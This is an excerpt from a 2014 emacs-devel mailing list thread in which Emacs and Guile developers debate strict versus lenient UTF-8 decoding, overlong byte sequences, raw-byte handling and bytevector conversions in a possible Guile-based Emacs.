Stefan Monnier <monnier@iro.umontreal.ca> writes:

> Please, could you move this discussion elsewhere.  While I understand
> the Guile developers might want to try and reuse either Emacs's code
> or at least its design and expertise, this discussion is about Guile,
> not about Emacs,

I think this is false.  This discussion, initiated by Richard, is about
how Guile can adapt itself to better meet the needs of Emacs.  If the
discussion happens where very few Emacs users/developers are present,
then I don't see how it can be useful.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 19:17                                             ` Richard Stallman
  2014-10-06 19:59                                               ` David Kastrup
@ 2014-10-07  0:10                                               ` Mark H Weaver
  2014-10-07 14:04                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07  0:10 UTC (permalink / raw)
  To: Richard Stallman
  Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

>     However, I would argue that even in Emacs, string<->bytevector
>     conversions should be strict by default,
>
> What is a "bytevector"?

Bytevectors are packed arrays of unsigned integers < 256.  It is the
standard Scheme data type for performing binary I/O.  String operations
deliberately do not work on them.

In contrast, strings are packed arrays of characters, which in Scheme
are not integers but rather an abstract type representing Unicode code
points.

> How would it relate into Emacs?  Maybe your suggestion is a good one.

Implicit string<->bytevector conversions are needed almost every time a
string is passed to/from the C world, since most C APIs are based on
bytes not Unicode characters.  This includes I/O, command-line arguments
and environment variables (whether reading the ones given to us or
passing new ones down to subprocesses), POSIX file names, interfacing
with most C libraries, etc.

My suggestion is that these implicit conversions should be strict by
default.  IMO, only in specific cases (most notably when editing a file)
should invalid byte sequences by accepted, produced, or propagated.

The reasons are (1) to protect internal subsystems (subprocesses, C
functions linked with Guile, etc) from invalid input such as overlong
encodings, and (2) to catch errors early rather than silently producing
garbage in the face of programming errors.

However, it is of course up to the Emacs community to decide when
conversions should be strict.  Guile can provide both modes of
operation.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:34                                                 ` David Kastrup
@ 2014-10-07  0:33                                                   ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07  0:33 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, emacs-devel

David Kastrup writes:

 > That sounds like you are talking about a processing pipe.

No, I'm talking about a Unicode conformant process.  If you don't need
Unicode conformance and do need to emit garbage, you can specify a
Unicode-like but non-conformant codec.  All I'm saying (and Mark I
believe is on the smae page, if not the same octet) is that

(1) Emacs codecs corresponding to published standards (specifically,
    UTF-8 and other UTFs) should conform to those standards by
    default, even where that means annoying users (they'll learn to
    request non-conformant codecs if that's really what they want).

(2) Emacs should make special effort at conformance with Unicode
    because it is especially well-defined.

Making this pleasant for users will require some effort, but will be
well worth it in the end.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:53                                                 ` David Kastrup
@ 2014-10-07  0:35                                                   ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07  0:35 UTC (permalink / raw)
  To: David Kastrup
  Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

David Kastrup writes:

 > In a security relevant context, you would just not reencode before
 > passing the information back to the outside.

That is ill-defined and almost surely not conforming to the process's
documentation, and therefore would not be acceptable in a security
context.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 19:15                                         ` Richard Stallman
@ 2014-10-07  0:46                                           ` Stephen J. Turnbull
  2014-10-07 14:04                                             ` Richard Stallman
  2014-10-10 10:09                                           ` Thien-Thi Nguyen
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07  0:46 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > Do people write spam/virus checkers using Guile?

I don't know.  Why do you care?  The example is valid, and they
*might*, in which case they need conservative (conformant when
conformance is implied by names, such as "UTF-8") behavior.  If such a
user discovers that Guile emits nonconformant UTF-8, they'll surely
have to wonder what other security holes they've imported by simply
selecting Guile as an application platform.

To put it another way, Mark said that Guile is intended to be useful
writing servers as well as interactive programs.  Spam checking is
simply a convenient example of a daemon application where undefined
behavior can easily result in undesired output.

However, the general principle is that undefined behavior can
sometimes be exploited, and therefore processes that run unattended
should have *all* their behavior defined.

This doesn't necessarily apply to Emacs, although I think it should.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 23:00                                                 ` Mark H Weaver
@ 2014-10-07  1:04                                                   ` Stefan Monnier
  0 siblings, 0 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-10-07  1:04 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, rms, dmantipov, emacs-devel, handa, Eli Zaretskii, stephen

> I think this is false.  This discussion, initiated by Richard, is about
> how Guile can adapt itself to better meet the needs of Emacs.  If the
> discussion happens where very few Emacs users/developers are present,
> then I don't see how it can be useful.

I understand you want Emacs developers to participate.  But I don't want
Emacs's mailing list to be drowned any more than it already is.


        Stefan


PS: Also I don't see why this discussion is useful at all.  It's just
people arguing about opinions, which I can't imagine you need any more
of.  If you need to know how Emacs works, just ask us.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:58                                                 ` David Kastrup
@ 2014-10-07  2:35                                                   ` Eli Zaretskii
  0 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-07  2:35 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

> From: David Kastrup <dak@gnu.org>
> Date: Mon, 06 Oct 2014 19:58:08 +0200
> 
> David Kastrup <dak@gnu.org> writes:
> 
> > Eli Zaretskii <eliz@gnu.org> writes:
> >
> >> Btw, Emacs doesn't expose the internal representation of these bytes
> >> easily to Lisp programs.  That is, whenever any program tries to
> >> access the character at that position, it gets the original raw byte
> >> that was there before the string was read from outside.  A Lisp
> >> program needs some very tricky and deliberate techniques to access the
> >> internal representation of such bytes.  (It isn't "overlong", btw, we
> >> just represent the 128 bytes as codepoints in the 0x3fffXX range, and
> >> encode it in UTF-8 with 5 bytes.)
> >
> > Oh.  Didn't we use 3byte surrogate words (also not valid Unicode but
> > encodable as 3 bytes) here?
> 
> Actually, one could even use overlong encodings of 0--127 (to represent
> raw bytes 128--255) and use only two bytes that way, but that's really
> asking for reencoding trouble.

As a matter of fact, we use a 2-byte representation for them.  What I
wrote above about 5 bytes is incorrect, sorry.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:04                                               ` Stephen J. Turnbull
  2014-10-06 17:34                                                 ` David Kastrup
@ 2014-10-07 14:03                                                 ` Richard Stallman
  2014-10-07 14:37                                                   ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:03 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    If the user thinks of the "stuff" as characters, they will be unhappy
    if the editor displays raw bytes for something that could be decoded,

What case does that refer to, concretely?

Emacs normally recognizes UTF-8 text and decodes it.  If some text
isn't proper UTF-8, it may use raw bytes for that text.  But when does
it do this for text that can be decoded as UTF-8?  I don't think
that ever happens.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:43                                               ` Stephen J. Turnbull
  2014-10-06 17:53                                                 ` David Kastrup
@ 2014-10-07 14:03                                                 ` Richard Stallman
  2014-10-07 14:21                                                   ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:03 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

In the GNU Project, we do not "obey" standards.  Rather, we take them
into account when judging what is best for the program to do.

Emacs could conceivably report an error after decoding a file as UTF-8
which turns out to have invalid text.  That way, the user will have
the chance to decide whether to accept the decoding or not.  If the user
accepts it, the buffer should represent everything that is in the file.


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 18:04                                               ` Stefan Monnier
  2014-10-06 23:00                                                 ` Mark H Weaver
@ 2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:03 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: dak, mhw, dmantipov, emacs-devel, handa, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

This discussion is about making Guile and Emacs work together.
I can't think of any other list that would be as good.
If this were an ongoing thing, perhaps we should make a new list,
but I don't think it will be needed.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07  0:10                                               ` Mark H Weaver
@ 2014-10-07 14:04                                                 ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:04 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    My suggestion is that these implicit conversions should be strict by
    default.

I see no problem with that.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07  0:46                                           ` Stephen J. Turnbull
@ 2014-10-07 14:04                                             ` Richard Stallman
  2014-10-07 15:43                                               ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:04 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

     > Do people write spam/virus checkers using Guile?

    I don't know.  Why do you care?

Because hypothetical examples that I think are unlikely to really
occur carry very little weight in this argument.

      If such a
    user discovers that Guile emits nonconformant UTF-8, they'll surely
    have to wonder what other security holes they've imported by simply
    selecting Guile as an application platform.

I don't think we should make practical decisions based on such "What
would they think?" arguments.  We should do what's right, and people
can think what they like.

    To put it another way, Mark said that Guile is intended to be useful
    writing servers as well as interactive programs.

This discussion is about Guile in the context of Emacs specifically.
"What Guile does" generally is a different, though related, topic.
Guile could follow the Unicode spec in normal operation, but offer
another mode that Emacs can use.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:47                                             ` Eli Zaretskii
                                                                 ` (2 preceding siblings ...)
  2014-10-06 18:04                                               ` Stefan Monnier
@ 2014-10-07 14:04                                               ` Richard Stallman
  2014-10-07 14:14                                                 ` David Kastrup
  2014-10-07 14:21                                                 ` Andreas Schwab
  3 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:04 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

      For
    >> example, the ASCII quote (") can be represented as the single byte 0x22,
    >> the two byte sequence 0xC0 0xA2, etc.

What does Emacs do now with a file that contains these "overlong"
sequences?


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 14:04                                               ` Richard Stallman
@ 2014-10-07 14:14                                                 ` David Kastrup
       [not found]                                                   ` <"<83y4srjaot.fsf"@gnu.org>
                                                                     ` (2 more replies)
  2014-10-07 14:21                                                 ` Andreas Schwab
  1 sibling, 3 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 14:14 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>       For
>     >> example, the ASCII quote (") can be represented as the single byte 0x22,
>     >> the two byte sequence 0xC0 0xA2, etc.
>
> What does Emacs do now with a file that contains these "overlong"
> sequences?

UTF-8 is defined as not containing "overlong" sequences, so Emacs
decodes them into two raw-byte indicating characters, one indicating
0xC0, one indicating 0xA2.  When encoding, it reassembles them into
0xC0 0xA2.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 14:04                                               ` Richard Stallman
  2014-10-07 14:14                                                 ` David Kastrup
@ 2014-10-07 14:21                                                 ` Andreas Schwab
  1 sibling, 0 replies; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 14:21 UTC (permalink / raw)
  To: rms
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

>       For
>     >> example, the ASCII quote (") can be represented as the single byte 0x22,
>     >> the two byte sequence 0xC0 0xA2, etc.
>
> What does Emacs do now with a file that contains these "overlong"
> sequences?

It reads it with them as individual eight-bit chars, if you force it to
be decoded as utf-8.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 14:03                                                 ` Richard Stallman
@ 2014-10-07 14:21                                                   ` David Kastrup
  2014-10-07 15:16                                                     ` Andreas Schwab
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 14:21 UTC (permalink / raw)
  To: emacs-devel

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
> In the GNU Project, we do not "obey" standards.  Rather, we take them
> into account when judging what is best for the program to do.
>
> Emacs could conceivably report an error after decoding a file as UTF-8
> which turns out to have invalid text.  That way, the user will have
> the chance to decide whether to accept the decoding or not.

One problem with that is that quite often Emacs' choice of a coding
system for a buffer is the result of heuristics rather than dependable
information.  Not making a fuzz might often be simplest.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 14:03                                                 ` Richard Stallman
@ 2014-10-07 14:37                                                   ` Eli Zaretskii
  0 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-07 14:37 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Tue, 07 Oct 2014 10:03:37 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: eliz@gnu.org, dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca
> 
> Emacs normally recognizes UTF-8 text and decodes it.  If some text
> isn't proper UTF-8, it may use raw bytes for that text.  But when does
> it do this for text that can be decoded as UTF-8?  I don't think
> that ever happens.

It could happen if the user instructed Emacs to decode the text as
something else, like Latin-1.  But then I think it's the user's
responsibility.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 14:14                                                 ` David Kastrup
       [not found]                                                   ` <"<83y4srjaot.fsf"@gnu.org>
@ 2014-10-07 15:15                                                   ` Mark H Weaver
  2014-10-07 15:31                                                     ` Andreas Schwab
  2014-10-07 16:59                                                     ` Eli Zaretskii
  2014-10-08  0:47                                                   ` Richard Stallman
  2 siblings, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07 15:15 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii, stephen

David Kastrup <dak@gnu.org> writes:

> Richard Stallman <rms@gnu.org> writes:
>
>> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
>> [[[ whether defending the US Constitution against all enemies,     ]]]
>> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>>
>>       For
>>     >> example, the ASCII quote (") can be represented as the single byte 0x22,
>>     >> the two byte sequence 0xC0 0xA2, etc.
>>
>> What does Emacs do now with a file that contains these "overlong"
>> sequences?
>
> UTF-8 is defined as not containing "overlong" sequences, so Emacs
> decodes them into two raw-byte indicating characters, one indicating
> 0xC0, one indicating 0xA2.  When encoding, it reassembles them into
> 0xC0 0xA2.

When editing a file, this is probably the right default behavior,
although ideally it should warn the user.

However, if the overlong sequence came from the network, and Emacs
propagates it unchanged to internal subsystems[*] (e.g. via command-line
arguments to subprocesses), that's not good.  It exposes another program
to invalid input -- a program that might not be designed for exposure to
possible attacks via overlong encodings.

[*] By "internal subsystem" I mean any part of the overall system that's
not directly accessible to attacks.  This includes subprocesses or
daemons that are not accessible from the outside network.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 14:21                                                   ` David Kastrup
@ 2014-10-07 15:16                                                     ` Andreas Schwab
  2014-10-07 15:33                                                       ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 15:16 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> One problem with that is that quite often Emacs' choice of a coding
> system for a buffer is the result of heuristics rather than dependable
> information.  Not making a fuzz might often be simplest.

If you try to save a buffer Emacs will check whether all characters are
encodable, and complain (and ask) if they aren't.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:15                                                   ` Mark H Weaver
@ 2014-10-07 15:31                                                     ` Andreas Schwab
  2014-10-07 15:40                                                       ` David Kastrup
  2014-10-07 16:34                                                       ` Mark H Weaver
  2014-10-07 16:59                                                     ` Eli Zaretskii
  1 sibling, 2 replies; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 15:31 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: David Kastrup, Richard Stallman, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> However, if the overlong sequence came from the network, and Emacs
> propagates it unchanged to internal subsystems[*] (e.g. via command-line
> arguments to subprocesses), that's not good.  It exposes another program
> to invalid input -- a program that might not be designed for exposure to
> possible attacks via overlong encodings.

At least it doesn't make it worse (it is unchanged from the situation if
you remove Emacs as a filter).

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:16                                                     ` Andreas Schwab
@ 2014-10-07 15:33                                                       ` David Kastrup
  2014-10-07 15:42                                                         ` Andreas Schwab
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 15:33 UTC (permalink / raw)
  To: emacs-devel

Andreas Schwab <schwab@suse.de> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> One problem with that is that quite often Emacs' choice of a coding
>> system for a buffer is the result of heuristics rather than dependable
>> information.  Not making a fuzz might often be simplest.
>
> If you try to save a buffer Emacs will check whether all characters are
> encodable, and complain (and ask) if they aren't.

Sure, but a raw byte is trivially encodable since it is no character.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:31                                                     ` Andreas Schwab
@ 2014-10-07 15:40                                                       ` David Kastrup
  2014-10-07 18:32                                                         ` Stephen J. Turnbull
  2014-10-07 16:34                                                       ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 15:40 UTC (permalink / raw)
  To: Andreas Schwab
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Andreas Schwab <schwab@suse.de> writes:

> Mark H Weaver <mhw@netris.org> writes:
>
>> However, if the overlong sequence came from the network, and Emacs
>> propagates it unchanged to internal subsystems[*] (e.g. via command-line
>> arguments to subprocesses), that's not good.  It exposes another program
>> to invalid input -- a program that might not be designed for exposure to
>> possible attacks via overlong encodings.
>
> At least it doesn't make it worse (it is unchanged from the situation if
> you remove Emacs as a filter).

And if Emacs is supposed to be used as a propagate-only-valid-utf-8
filter (which it definitely can do), that should be in the spec and
Emacs should then programmed to do the desired failure mode.

Just bombing out in some predetermined manner in some fixed location is
not a substitute for properly planned behavior.

If you want Emacs (or GUILE, or whatever) to take a particular action in
a particular case in order to provide output with particular guarantees
to particular processing stages, then "somebody thought it was a good
idea" in some inconvenient place is not a substitute.

Unless told differently, a tool like GUILE or Emacs, when used as a
filter, should do exactly _those_ filtering operations you tell it.  Not
more, not less.  Anything else is _guaranteed_ to get in the way
eventually.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:33                                                       ` David Kastrup
@ 2014-10-07 15:42                                                         ` Andreas Schwab
  2014-10-07 16:03                                                           ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 15:42 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>
>>> One problem with that is that quite often Emacs' choice of a coding
>>> system for a buffer is the result of heuristics rather than dependable
>>> information.  Not making a fuzz might often be simplest.
>>
>> If you try to save a buffer Emacs will check whether all characters are
>> encodable, and complain (and ask) if they aren't.
>
> Sure, but a raw byte is trivially encodable since it is no character.

This is a contradiction.  It isn't a character, so it isn't encodable.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 14:04                                             ` Richard Stallman
@ 2014-10-07 15:43                                               ` Stephen J. Turnbull
  2014-10-07 16:01                                                 ` David Kastrup
  2014-10-07 16:16                                                 ` David Kastrup
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07 15:43 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 >     To put it another way, Mark said that Guile is intended to be useful
 >     writing servers as well as interactive programs.
 > 
 > This discussion is about Guile in the context of Emacs specifically.
 > "What Guile does" generally is a different, though related, topic.
 > Guile could follow the Unicode spec in normal operation, but offer
 > another mode that Emacs can use.

It *could*, but it for the default is entirely unclear to me that it
*should*.  Some use cases, such as AUCTeX parsing error messages from
TeX (which treats content quoted from the document as bytes, and so
may slice characters into two invalid byte sequences), will use some
sort of reversible encoding of raw bytes (the current Emacs encoding
is one option, of course).  But they can do that explicitly.

However, in general I think that Emacs should help users who are naive
about Unicode to avoid emitting invalid Unicode, and so should default
to querying the user for permission if that were about to happen.  It
should not silently pass on corrupt input to the output.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:43                                               ` Stephen J. Turnbull
@ 2014-10-07 16:01                                                 ` David Kastrup
  2014-10-07 18:15                                                   ` Stephen J. Turnbull
  2014-10-07 16:16                                                 ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:01 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Richard Stallman writes:
>
>  >     To put it another way, Mark said that Guile is intended to be useful
>  >     writing servers as well as interactive programs.
>  > 
>  > This discussion is about Guile in the context of Emacs specifically.
>  > "What Guile does" generally is a different, though related, topic.
>  > Guile could follow the Unicode spec in normal operation, but offer
>  > another mode that Emacs can use.
>
> It *could*, but it for the default is entirely unclear to me that it
> *should*.  Some use cases, such as AUCTeX parsing error messages from
> TeX (which treats content quoted from the document as bytes, and so
> may slice characters into two invalid byte sequences), will use some
> sort of reversible encoding of raw bytes (the current Emacs encoding
> is one option, of course).  But they can do that explicitly.
>
> However, in general I think that Emacs should help users who are naive
> about Unicode to avoid emitting invalid Unicode, and so should default
> to querying the user for permission if that were about to happen.  It
> should not silently pass on corrupt input to the output.

I repeat: that is to be the choice of the application rather than the
engine.  "We know better than the application writer what he wants" is
rarely going to work to the satisfaction of all.  This leads to "how do
I best work around the engine" approaches that tend to be much less
maintainable than explicit actions taking in a place intended by the
application.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:42                                                         ` Andreas Schwab
@ 2014-10-07 16:03                                                           ` David Kastrup
  2014-10-07 16:16                                                             ` Andreas Schwab
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:03 UTC (permalink / raw)
  To: Andreas Schwab; +Cc: emacs-devel

Andreas Schwab <schwab@suse.de> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> Andreas Schwab <schwab@suse.de> writes:
>>
>>> David Kastrup <dak@gnu.org> writes:
>>>
>>>> One problem with that is that quite often Emacs' choice of a coding
>>>> system for a buffer is the result of heuristics rather than dependable
>>>> information.  Not making a fuzz might often be simplest.
>>>
>>> If you try to save a buffer Emacs will check whether all characters are
>>> encodable, and complain (and ask) if they aren't.
>>
>> Sure, but a raw byte is trivially encodable since it is no character.
>
> This is a contradiction.  It isn't a character, so it isn't encodable.

The character representation of "raw byte" is trivially encodable since
it represents a single byte in any encoding.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 16:03                                                           ` David Kastrup
@ 2014-10-07 16:16                                                             ` Andreas Schwab
  2014-10-07 16:24                                                               ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 16:16 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>
>>> Andreas Schwab <schwab@suse.de> writes:
>>>
>>>> David Kastrup <dak@gnu.org> writes:
>>>>
>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>> information.  Not making a fuzz might often be simplest.
>>>>
>>>> If you try to save a buffer Emacs will check whether all characters are
>>>> encodable, and complain (and ask) if they aren't.
>>>
>>> Sure, but a raw byte is trivially encodable since it is no character.
>>
>> This is a contradiction.  It isn't a character, so it isn't encodable.
>
> The character representation of "raw byte" is trivially encodable since
> it represents a single byte in any encoding.

No encoding (except raw-text) can encode characters from the eight-bit
charset.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:43                                               ` Stephen J. Turnbull
  2014-10-07 16:01                                                 ` David Kastrup
